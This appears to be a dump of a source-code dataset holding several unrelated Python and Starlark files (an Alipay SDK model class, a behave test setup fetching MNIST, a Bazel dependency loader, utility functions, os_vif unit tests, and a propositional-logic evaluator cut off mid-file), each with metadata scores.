#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class AlipayCommerceMedicalCardQueryModel(object): def __init__(self): self._auth_code = None self._buyer_id = None self._card_org_no = None self._extend_params = None self._return_url = None self._scene = None @property def auth_code(self): return self._auth_code @auth_code.setter def auth_code(self, value): self._auth_code = value @property def buyer_id(self): return self._buyer_id @buyer_id.setter def buyer_id(self, value): self._buyer_id = value @property def card_org_no(self): return self._card_org_no @card_org_no.setter def card_org_no(self, value): self._card_org_no = value @property def extend_params(self): return self._extend_params @extend_params.setter def extend_params(self, value): self._extend_params = value @property def return_url(self): return self._return_url @return_url.setter def return_url(self, value): self._return_url = value @property def scene(self): return self._scene @scene.setter def scene(self, value): self._scene = value def to_alipay_dict(self): params = dict() if self.auth_code: if hasattr(self.auth_code, 'to_alipay_dict'): params['auth_code'] = self.auth_code.to_alipay_dict() else: params['auth_code'] = self.auth_code if self.buyer_id: if hasattr(self.buyer_id, 'to_alipay_dict'): params['buyer_id'] = self.buyer_id.to_alipay_dict() else: params['buyer_id'] = self.buyer_id if self.card_org_no: if hasattr(self.card_org_no, 'to_alipay_dict'): params['card_org_no'] = self.card_org_no.to_alipay_dict() else: params['card_org_no'] = self.card_org_no if self.extend_params: if hasattr(self.extend_params, 'to_alipay_dict'): params['extend_params'] = self.extend_params.to_alipay_dict() else: params['extend_params'] = self.extend_params if self.return_url: if hasattr(self.return_url, 'to_alipay_dict'): params['return_url'] = self.return_url.to_alipay_dict() else: params['return_url'] = self.return_url if self.scene: if 
hasattr(self.scene, 'to_alipay_dict'): params['scene'] = self.scene.to_alipay_dict() else: params['scene'] = self.scene return params @staticmethod def from_alipay_dict(d): if not d: return None o = AlipayCommerceMedicalCardQueryModel() if 'auth_code' in d: o.auth_code = d['auth_code'] if 'buyer_id' in d: o.buyer_id = d['buyer_id'] if 'card_org_no' in d: o.card_org_no = d['card_org_no'] if 'extend_params' in d: o.extend_params = d['extend_params'] if 'return_url' in d: o.return_url = d['return_url'] if 'scene' in d: o.scene = d['scene'] return o
en
0.352855
#!/usr/bin/env python # -*- coding: utf-8 -*-
2.06078
2
test/features/environment.py
biovault/nptsne
30
6629029
import os from six.moves import urllib from scipy.io import loadmat from behave import * import logging def parse_number(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return int(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Number=parse_number) def parse_float(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return float(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Float=parse_float) def before_all(context): console = logging.StreamHandler() console.setLevel(logging.INFO) logging.getLogger('').addHandler(console) print('Initialize environment') # Get the mnist data for testing mnist_path = 'mnist-original.mat' if not os.path.isfile(mnist_path): mnist_alternative_url = 'https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat' response = urllib.request.urlopen(mnist_alternative_url) with open(mnist_path, 'wb') as f: content = response.read() f.write(content) mnist_raw = loadmat(mnist_path) context.mnist = { 'data': mnist_raw['data'].T, 'target': mnist_raw['label'][0], 'COL_NAMES': ['label', 'data'] }
import os from six.moves import urllib from scipy.io import loadmat from behave import * import logging def parse_number(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return int(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Number=parse_number) def parse_float(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return float(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Float=parse_float) def before_all(context): console = logging.StreamHandler() console.setLevel(logging.INFO) logging.getLogger('').addHandler(console) print('Initialize environment') # Get the mnist data for testing mnist_path = 'mnist-original.mat' if not os.path.isfile(mnist_path): mnist_alternative_url = 'https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat' response = urllib.request.urlopen(mnist_alternative_url) with open(mnist_path, 'wb') as f: content = response.read() f.write(content) mnist_raw = loadmat(mnist_path) context.mnist = { 'data': mnist_raw['data'].T, 'target': mnist_raw['label'][0], 'COL_NAMES': ['label', 'data'] }
en
0.480549
Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. # -- REGISTER: User-defined type converter (parse_type). Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. # -- REGISTER: User-defined type converter (parse_type). # Get the mnist data for testing
2.510736
3
maven/internal/require.bzl
Globegitter/rules_maven
0
6629030
<filename>maven/internal/require.bzl def _needs_install(name, dep, hkeys=["sha256", "sha1", "tag"], verbose=0): # Does it already exist? existing_rule = native.existing_rule(name) if not existing_rule: return True # If it has already been defined and our dependency lists a # hash, do these match? If a hash mismatch is encountered, has # the user specifically granted permission to continue? for hkey in hkeys: expected = dep.get(hkey) actual = existing_rule.get(hkey) if expected: if expected != actual: msg = """ An existing {0} rule '{1}' was already loaded with a {2} value of '{3}'. Overwriting this with the requested value ('{4}'). You *should* either remove the pre-existing rule from your WORKSPACE or exclude it from loading by rules_maven. """.format(existing_rule["kind"], name, hkey, actual, expected) print(msg) else: if verbose > 1: print("Skip reload %s: %s = %s" % (name, hkey, actual)) return False # No kheys for this rule - in this case no reload; first one loaded wins. if verbose > 1: print("Skipping reload of existing target %s" % name) return False def _install(deps, verbose): """Install a list if dependencies for matching native rules. Return: list of deps that have no matching native rule. """ todo = [] for d in deps: name = d.get("name") rule = d.pop("rule", None) if not rule: fail("Missing attribute 'rule': %s" % name) if hasattr(native, rule): rule = getattr(native, rule) if verbose: print("Loading %s)" % name) rule(**d) else: d["rule"] = rule todo.append(d) return todo def require(keys, deps = {}, overrides = {}, excludes = [], verbose = 0): # # Make a list of non-excluded required deps with merged data. # required = [] for key in keys: dep = deps.get(key) if not dep: fail("Unknown workspace dependency: %s" % key) d = dict(**dep) # copy the 'frozen' object. 
if not key in excludes: over = overrides.get(key) data = d + over if over else d if _needs_install(key, data, verbose=verbose): data["name"] = key required.append(data) return _install(required, verbose)
<filename>maven/internal/require.bzl def _needs_install(name, dep, hkeys=["sha256", "sha1", "tag"], verbose=0): # Does it already exist? existing_rule = native.existing_rule(name) if not existing_rule: return True # If it has already been defined and our dependency lists a # hash, do these match? If a hash mismatch is encountered, has # the user specifically granted permission to continue? for hkey in hkeys: expected = dep.get(hkey) actual = existing_rule.get(hkey) if expected: if expected != actual: msg = """ An existing {0} rule '{1}' was already loaded with a {2} value of '{3}'. Overwriting this with the requested value ('{4}'). You *should* either remove the pre-existing rule from your WORKSPACE or exclude it from loading by rules_maven. """.format(existing_rule["kind"], name, hkey, actual, expected) print(msg) else: if verbose > 1: print("Skip reload %s: %s = %s" % (name, hkey, actual)) return False # No kheys for this rule - in this case no reload; first one loaded wins. if verbose > 1: print("Skipping reload of existing target %s" % name) return False def _install(deps, verbose): """Install a list if dependencies for matching native rules. Return: list of deps that have no matching native rule. """ todo = [] for d in deps: name = d.get("name") rule = d.pop("rule", None) if not rule: fail("Missing attribute 'rule': %s" % name) if hasattr(native, rule): rule = getattr(native, rule) if verbose: print("Loading %s)" % name) rule(**d) else: d["rule"] = rule todo.append(d) return todo def require(keys, deps = {}, overrides = {}, excludes = [], verbose = 0): # # Make a list of non-excluded required deps with merged data. # required = [] for key in keys: dep = deps.get(key) if not dep: fail("Unknown workspace dependency: %s" % key) d = dict(**dep) # copy the 'frozen' object. 
if not key in excludes: over = overrides.get(key) data = d + over if over else d if _needs_install(key, data, verbose=verbose): data["name"] = key required.append(data) return _install(required, verbose)
en
0.893348
# Does it already exist? # If it has already been defined and our dependency lists a # hash, do these match? If a hash mismatch is encountered, has # the user specifically granted permission to continue? An existing {0} rule '{1}' was already loaded with a {2} value of '{3}'. Overwriting this with the requested value ('{4}'). You *should* either remove the pre-existing rule from your WORKSPACE or exclude it from loading by rules_maven. # No kheys for this rule - in this case no reload; first one loaded wins. Install a list if dependencies for matching native rules. Return: list of deps that have no matching native rule. # # Make a list of non-excluded required deps with merged data. # # copy the 'frozen' object.
1.943064
2
dito/utils.py
dhaase-de/dito
0
6629031
<gh_stars>0 import collections import datetime import errno import os import tempfile import cv2 import numpy as np #### #%%% OpenCV-related #### def cv2_version(): return tuple(int(value) for value in cv2.__version__.split(".")) #### #%%% checks #### def get_validated_tuple(x, type_, count, min_value=None, max_value=None): error_text = "Argument must be a scalar or a {}-tuple/list of type '{}' (min_value={}, max_value={})".format(count, type_, min_value, max_value) # check tuple/list if isinstance(x, tuple): pass elif isinstance(x, list): x = tuple(x) elif isinstance(x, type_): x = (x,) * count else: raise ValueError(error_text) # check length if len(x) != count: raise ValueError(error_text) # check value ranges for value in x: if ((min_value is not None) and (value < min_value)) or ((max_value is not None) and (value > max_value)): raise ValueError(error_text) return x #### #%%% number-related #### def adaptive_round(number, digit_count=4): """ Rounds a number to the first `digit_count` digits after the appearance of the first non-zero digit. This function supports Python `float`s and `int`s as well as NumPy scalars of any type (e.g., `np.float32`, `np.uint8`, etc.). """ with np.errstate(divide="ignore"): try: magnitude = np.floor(np.log10(np.abs(number))) except ValueError: magnitude = 0 if not np.isfinite(magnitude): magnitude = 0 round_digit_count = int(digit_count - magnitude - 1) return round(number, round_digit_count) #### #%%% file-related #### def mkdir(dirname): """ Create the given directory if it does not already exist. """ if dirname == "": return try: os.makedirs(dirname) except OSError as e: if e.errno != errno.EEXIST: raise def get_temp_dir(prefix): """ Creates and returns temporary directory. The property `.name` holds the path. It can be deleted using the `.cleanup()` method. """ return tempfile.TemporaryDirectory(prefix=prefix) def human_bytes(byte_count): """ Formats a given `byte_count` into a human-readable string. 
""" prefixes = collections.OrderedDict() prefixes["KiB"] = 1024.0**1 prefixes["MiB"] = 1024.0**2 prefixes["GiB"] = 1024.0**3 count = byte_count unit = "bytes" for (new_unit, new_scale) in prefixes.items(): new_count = byte_count / new_scale if new_count < 1.0: break else: count = new_count unit = new_unit if isinstance(count, int): # count is an integer -> use no decimal places return "{} {}".format(count, unit) else: # count is a float -> use two decimal places return "{:.2f} {}".format(count, unit) #### #%%% output-related #### def now_str(mode="compact", date=True, time=True, microtime=True): """ Return the current date and/or time as string. """ # check arguments if not (date or time or microtime): raise ValueError("At least one of 'date', 'time', 'microtime' must be `True`") # select format string parts based on mode if mode == "compact": date_fmt = "%Y%m%d" time_sep = "_" time_fmt = "%H%M%S" micro_sep = "_" micro_fmt = "%f" elif mode == "readable": date_fmt = "%Y-%m-%d" time_sep = "__" time_fmt = "%H-%M-%S" micro_sep = "__" micro_fmt = "%f" elif mode == "print": date_fmt = "%Y-%m-%d" time_sep = " " time_fmt = "%H:%M:%S" micro_sep = "." micro_fmt = "%f" else: raise ValueError("Invalid mode '{}".format(mode)) # build final format string fmt = "" if date: fmt += date_fmt if time: if fmt != "": fmt += time_sep fmt += time_fmt if microtime: if fmt != "": fmt += micro_sep fmt += micro_fmt # return formatted date and/or time return datetime.datetime.now().strftime(fmt) def ftable(rows, first_row_is_header=False): """ Format the data specified in `rows` as table string. 
""" col_sep = " " sep_symbol = "-" # count the max length for each column col_count = max(len(row) for row in rows) col_lengths = [0] * col_count for row in rows: for n_col in range(col_count): col_lengths[n_col] = max(col_lengths[n_col], len(str(row[n_col]))) # the line at the top and bottom sep_line = col_sep.join(sep_symbol * col_length for col_length in col_lengths) # transform rows into lines lines = [] lines.append(sep_line) for (n_row, row) in enumerate(rows): col_strs = [] for (col_length, col) in zip(col_lengths, row): col_str = "{{: <{}}}".format(col_length).format(str(col)) col_strs.append(col_str) lines.append(col_sep.join(col_strs)) if first_row_is_header and (n_row == 0): lines.append(sep_line) lines.append(sep_line) # return table as single string return "\n".join(lines) def ptable(rows, ftable_kwargs=None, print_kwargs=None): """ Print the data specified in `rows` as table. """ if ftable_kwargs is None: ftable_kwargs = {} if print_kwargs is None: print_kwargs = {} print(ftable(rows=rows, **ftable_kwargs), **print_kwargs)
import collections import datetime import errno import os import tempfile import cv2 import numpy as np #### #%%% OpenCV-related #### def cv2_version(): return tuple(int(value) for value in cv2.__version__.split(".")) #### #%%% checks #### def get_validated_tuple(x, type_, count, min_value=None, max_value=None): error_text = "Argument must be a scalar or a {}-tuple/list of type '{}' (min_value={}, max_value={})".format(count, type_, min_value, max_value) # check tuple/list if isinstance(x, tuple): pass elif isinstance(x, list): x = tuple(x) elif isinstance(x, type_): x = (x,) * count else: raise ValueError(error_text) # check length if len(x) != count: raise ValueError(error_text) # check value ranges for value in x: if ((min_value is not None) and (value < min_value)) or ((max_value is not None) and (value > max_value)): raise ValueError(error_text) return x #### #%%% number-related #### def adaptive_round(number, digit_count=4): """ Rounds a number to the first `digit_count` digits after the appearance of the first non-zero digit. This function supports Python `float`s and `int`s as well as NumPy scalars of any type (e.g., `np.float32`, `np.uint8`, etc.). """ with np.errstate(divide="ignore"): try: magnitude = np.floor(np.log10(np.abs(number))) except ValueError: magnitude = 0 if not np.isfinite(magnitude): magnitude = 0 round_digit_count = int(digit_count - magnitude - 1) return round(number, round_digit_count) #### #%%% file-related #### def mkdir(dirname): """ Create the given directory if it does not already exist. """ if dirname == "": return try: os.makedirs(dirname) except OSError as e: if e.errno != errno.EEXIST: raise def get_temp_dir(prefix): """ Creates and returns temporary directory. The property `.name` holds the path. It can be deleted using the `.cleanup()` method. """ return tempfile.TemporaryDirectory(prefix=prefix) def human_bytes(byte_count): """ Formats a given `byte_count` into a human-readable string. 
""" prefixes = collections.OrderedDict() prefixes["KiB"] = 1024.0**1 prefixes["MiB"] = 1024.0**2 prefixes["GiB"] = 1024.0**3 count = byte_count unit = "bytes" for (new_unit, new_scale) in prefixes.items(): new_count = byte_count / new_scale if new_count < 1.0: break else: count = new_count unit = new_unit if isinstance(count, int): # count is an integer -> use no decimal places return "{} {}".format(count, unit) else: # count is a float -> use two decimal places return "{:.2f} {}".format(count, unit) #### #%%% output-related #### def now_str(mode="compact", date=True, time=True, microtime=True): """ Return the current date and/or time as string. """ # check arguments if not (date or time or microtime): raise ValueError("At least one of 'date', 'time', 'microtime' must be `True`") # select format string parts based on mode if mode == "compact": date_fmt = "%Y%m%d" time_sep = "_" time_fmt = "%H%M%S" micro_sep = "_" micro_fmt = "%f" elif mode == "readable": date_fmt = "%Y-%m-%d" time_sep = "__" time_fmt = "%H-%M-%S" micro_sep = "__" micro_fmt = "%f" elif mode == "print": date_fmt = "%Y-%m-%d" time_sep = " " time_fmt = "%H:%M:%S" micro_sep = "." micro_fmt = "%f" else: raise ValueError("Invalid mode '{}".format(mode)) # build final format string fmt = "" if date: fmt += date_fmt if time: if fmt != "": fmt += time_sep fmt += time_fmt if microtime: if fmt != "": fmt += micro_sep fmt += micro_fmt # return formatted date and/or time return datetime.datetime.now().strftime(fmt) def ftable(rows, first_row_is_header=False): """ Format the data specified in `rows` as table string. 
""" col_sep = " " sep_symbol = "-" # count the max length for each column col_count = max(len(row) for row in rows) col_lengths = [0] * col_count for row in rows: for n_col in range(col_count): col_lengths[n_col] = max(col_lengths[n_col], len(str(row[n_col]))) # the line at the top and bottom sep_line = col_sep.join(sep_symbol * col_length for col_length in col_lengths) # transform rows into lines lines = [] lines.append(sep_line) for (n_row, row) in enumerate(rows): col_strs = [] for (col_length, col) in zip(col_lengths, row): col_str = "{{: <{}}}".format(col_length).format(str(col)) col_strs.append(col_str) lines.append(col_sep.join(col_strs)) if first_row_is_header and (n_row == 0): lines.append(sep_line) lines.append(sep_line) # return table as single string return "\n".join(lines) def ptable(rows, ftable_kwargs=None, print_kwargs=None): """ Print the data specified in `rows` as table. """ if ftable_kwargs is None: ftable_kwargs = {} if print_kwargs is None: print_kwargs = {} print(ftable(rows=rows, **ftable_kwargs), **print_kwargs)
en
0.701296
#### #%%% OpenCV-related #### #### #%%% checks #### # check tuple/list # check length # check value ranges #### #%%% number-related #### Rounds a number to the first `digit_count` digits after the appearance of the first non-zero digit. This function supports Python `float`s and `int`s as well as NumPy scalars of any type (e.g., `np.float32`, `np.uint8`, etc.). #### #%%% file-related #### Create the given directory if it does not already exist. Creates and returns temporary directory. The property `.name` holds the path. It can be deleted using the `.cleanup()` method. Formats a given `byte_count` into a human-readable string. # count is an integer -> use no decimal places # count is a float -> use two decimal places #### #%%% output-related #### Return the current date and/or time as string. # check arguments # select format string parts based on mode # build final format string # return formatted date and/or time Format the data specified in `rows` as table string. # count the max length for each column # the line at the top and bottom # transform rows into lines # return table as single string Print the data specified in `rows` as table.
2.972224
3
os_vif/tests/test_host_info.py
mail2nsrajesh/os-vif
0
6629032
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from os_vif import exception from os_vif import objects from os_vif.tests import base class TestHostInfo(base.TestCase): def setUp(self): super(TestHostInfo, self).setUp() self.host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) def test_serialization(self): json = self.host_info.obj_to_primitive() host_info = objects.host_info.HostInfo.obj_from_primitive(json) self.assertEqual(self.host_info, host_info) def test_plugin_existance(self): self.assertTrue(self.host_info.has_plugin("ovs")) self.assertFalse(self.host_info.has_plugin("fishfood")) def test_plugin_fetch(self): plugin = self.host_info.get_plugin("ovs") self.assertEqual("ovs", plugin.plugin_name) self.assertRaises(exception.NoMatchingPlugin, self.host_info.get_plugin, "fishfood") def test_vif_existance(self): plugin = self.host_info.get_plugin("ovs") self.assertTrue(plugin.has_vif("VIFOpenVSwitch")) 
self.assertFalse(plugin.has_vif("VIFFishFood")) def test_vif_fetch(self): plugin = self.host_info.get_plugin("ovs") vif = plugin.get_vif("VIFOpenVSwitch") self.assertEqual("VIFOpenVSwitch", vif.vif_object_name) self.assertRaises(exception.NoMatchingVIFClass, plugin.get_vif, "VIFFishFood") def test_common_version_no_obj(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFFishFood", min_version="1.0", max_version="1.8") self.assertRaises(exception.NoMatchingVIFClass, info.get_common_version) def test_common_version_no_version(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1729.0", max_version="8753.0") self.assertRaises(exception.NoSupportedVIFVersion, info.get_common_version) def test_common_version_ok(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="10.0") ver = info.get_common_version() self.assertEqual(objects.vif.VIFOpenVSwitch.VERSION, ver) def test_filtering(self): host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) host_info.filter_vif_types(["VIFBridge", "VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 2) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFBridge") plugin = host_info.plugin_info[1] self.assertEqual(len(plugin.vif_info), 2) self.assertEqual(plugin.vif_info[0].vif_object_name, 
"VIFBridge") self.assertEqual(plugin.vif_info[1].vif_object_name, "VIFOpenVSwitch") host_info.filter_vif_types(["VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 1) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFOpenVSwitch")
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from os_vif import exception from os_vif import objects from os_vif.tests import base class TestHostInfo(base.TestCase): def setUp(self): super(TestHostInfo, self).setUp() self.host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) def test_serialization(self): json = self.host_info.obj_to_primitive() host_info = objects.host_info.HostInfo.obj_from_primitive(json) self.assertEqual(self.host_info, host_info) def test_plugin_existance(self): self.assertTrue(self.host_info.has_plugin("ovs")) self.assertFalse(self.host_info.has_plugin("fishfood")) def test_plugin_fetch(self): plugin = self.host_info.get_plugin("ovs") self.assertEqual("ovs", plugin.plugin_name) self.assertRaises(exception.NoMatchingPlugin, self.host_info.get_plugin, "fishfood") def test_vif_existance(self): plugin = self.host_info.get_plugin("ovs") self.assertTrue(plugin.has_vif("VIFOpenVSwitch")) 
self.assertFalse(plugin.has_vif("VIFFishFood")) def test_vif_fetch(self): plugin = self.host_info.get_plugin("ovs") vif = plugin.get_vif("VIFOpenVSwitch") self.assertEqual("VIFOpenVSwitch", vif.vif_object_name) self.assertRaises(exception.NoMatchingVIFClass, plugin.get_vif, "VIFFishFood") def test_common_version_no_obj(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFFishFood", min_version="1.0", max_version="1.8") self.assertRaises(exception.NoMatchingVIFClass, info.get_common_version) def test_common_version_no_version(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1729.0", max_version="8753.0") self.assertRaises(exception.NoSupportedVIFVersion, info.get_common_version) def test_common_version_ok(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="10.0") ver = info.get_common_version() self.assertEqual(objects.vif.VIFOpenVSwitch.VERSION, ver) def test_filtering(self): host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) host_info.filter_vif_types(["VIFBridge", "VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 2) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFBridge") plugin = host_info.plugin_info[1] self.assertEqual(len(plugin.vif_info), 2) self.assertEqual(plugin.vif_info[0].vif_object_name, 
"VIFBridge") self.assertEqual(plugin.vif_info[1].vif_object_name, "VIFOpenVSwitch") host_info.filter_vif_types(["VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 1) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFOpenVSwitch")
en
0.859654
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License.
2.021569
2
pca_main/pcabuilder.py
p2424630/PCA
0
6629033
# @Author: GKarseras # @Date: 15 Nov 2020 11:13 from itertools import product from pca_main import pcaprop, pcaparser, pcalaws class InitProp(pcalaws.Laws): __slots__ = '_parsed' def __init__(self, proposition: str) -> None: self._parsed = pcaparser.PARSER.parse(proposition) def __eq__(self, other) -> bool: """ Structural equivalence 'A or B' != 'B or A' 'A or B' == '(A or B)' :param other: :return: bool """ return isinstance(other, self.__class__) and self._parsed == other._parsed def __str__(self): return str(self._parsed) def __repr__(self): return repr(self._parsed) @property def proposition(self): return self._parsed def unique_vars(self): """ :return: Sorted list of all unique variables. """ def _get_vars(op): """ Recursively traverse proposition and return a list of all variables. :param op: Proposition :return: list of variables """ if isinstance(op, pcaprop.Variable): return [op] if isinstance(op, pcaprop.UnaryOp): return _get_vars(op.prop) if isinstance(op, pcaprop.BinaryOp): return _get_vars(op.prop_l) + _get_vars(op.prop_r) return [] return sorted(set(_get_vars(self._parsed))) def interpretations(self): """ Create all possible interpretations for all unique variables. For each interpretation replace the variables in the proposition and evaluate, the result is then appended to the current interpretation's list and yielded. :return: iterable """ def _get_interp(op, interp): """ Recursively traverse proposition and replace all instances of variables with the interpretation mapping. :param op: Proposition :param interp: Dictionary mapping variables to TrueProp or FalseProp. :return: Proposition with FalseProp/TrueProp instead of Variables. 
""" if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.Variable): return interp[op] if isinstance(op, pcaprop.UnaryOp): return op.__class__(_get_interp(op.prop, interp)) if isinstance(op, pcaprop.BinaryOp): prop_l = _get_interp(op.prop_l, interp) prop_r = _get_interp(op.prop_r, interp) return op.__class__(prop_l, prop_r) prop_vars = self.unique_vars() len_prop_vars = len(prop_vars) if len_prop_vars < 1: # Return empty interpretation as this means the proposition is composed without any variables, # which means it can only take one, the current, interpretation. return # List of tuples for all possible interpretations for given number of variables combinations = product([pcaprop.FalseProp(), pcaprop.TrueProp()], repeat=len_prop_vars) for combination in combinations: # Create a dictionary mapping the variables to the current interpretation values. interp = dict(zip(prop_vars, combination)) # Replace the variables in the proposition with the current interpretation mapping. interp_prop = _get_interp(self._parsed, interp) interp_values = list(interp.values()) # For the current interpretation evaluate the proposition and append the result in the original # interpretation list. interp_values.append(self.eval_prop(interp_prop)) yield interp_values def satisfiable(self): """ Check if self is satisfiable, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if i[-1]: return pcaprop.TrueProp() return pcaprop.FalseProp() def tautology(self): """ Check if self is a tautology, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if not i[-1]: return pcaprop.FalseProp() return pcaprop.TrueProp() def contradiction(self): """ Check if self is a contradiction by returning the opposite of satisfiable. 
:return: bool (Class) """ return pcaprop.FalseProp() if self.satisfiable() else pcaprop.TrueProp() @staticmethod def eval_prop(op): """ Recursively traverse proposition and perform evaluation. :param op: Proposition :return: bool (Class) """ def _eval_prop(op): if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.NegationOp): return op.__class__(_eval_prop(op.prop)).eval() if isinstance(op, (pcaprop.DisjunctionOp, pcaprop.ConjunctionOp, pcaprop.ImplicationOp, pcaprop.EquivalenceOp)): prop_l = _eval_prop(op.prop_l) prop_r = _eval_prop(op.prop_r) return op.__class__(prop_l, prop_r).eval() return _eval_prop(op)
# @Author: GKarseras # @Date: 15 Nov 2020 11:13 from itertools import product from pca_main import pcaprop, pcaparser, pcalaws class InitProp(pcalaws.Laws): __slots__ = '_parsed' def __init__(self, proposition: str) -> None: self._parsed = pcaparser.PARSER.parse(proposition) def __eq__(self, other) -> bool: """ Structural equivalence 'A or B' != 'B or A' 'A or B' == '(A or B)' :param other: :return: bool """ return isinstance(other, self.__class__) and self._parsed == other._parsed def __str__(self): return str(self._parsed) def __repr__(self): return repr(self._parsed) @property def proposition(self): return self._parsed def unique_vars(self): """ :return: Sorted list of all unique variables. """ def _get_vars(op): """ Recursively traverse proposition and return a list of all variables. :param op: Proposition :return: list of variables """ if isinstance(op, pcaprop.Variable): return [op] if isinstance(op, pcaprop.UnaryOp): return _get_vars(op.prop) if isinstance(op, pcaprop.BinaryOp): return _get_vars(op.prop_l) + _get_vars(op.prop_r) return [] return sorted(set(_get_vars(self._parsed))) def interpretations(self): """ Create all possible interpretations for all unique variables. For each interpretation replace the variables in the proposition and evaluate, the result is then appended to the current interpretation's list and yielded. :return: iterable """ def _get_interp(op, interp): """ Recursively traverse proposition and replace all instances of variables with the interpretation mapping. :param op: Proposition :param interp: Dictionary mapping variables to 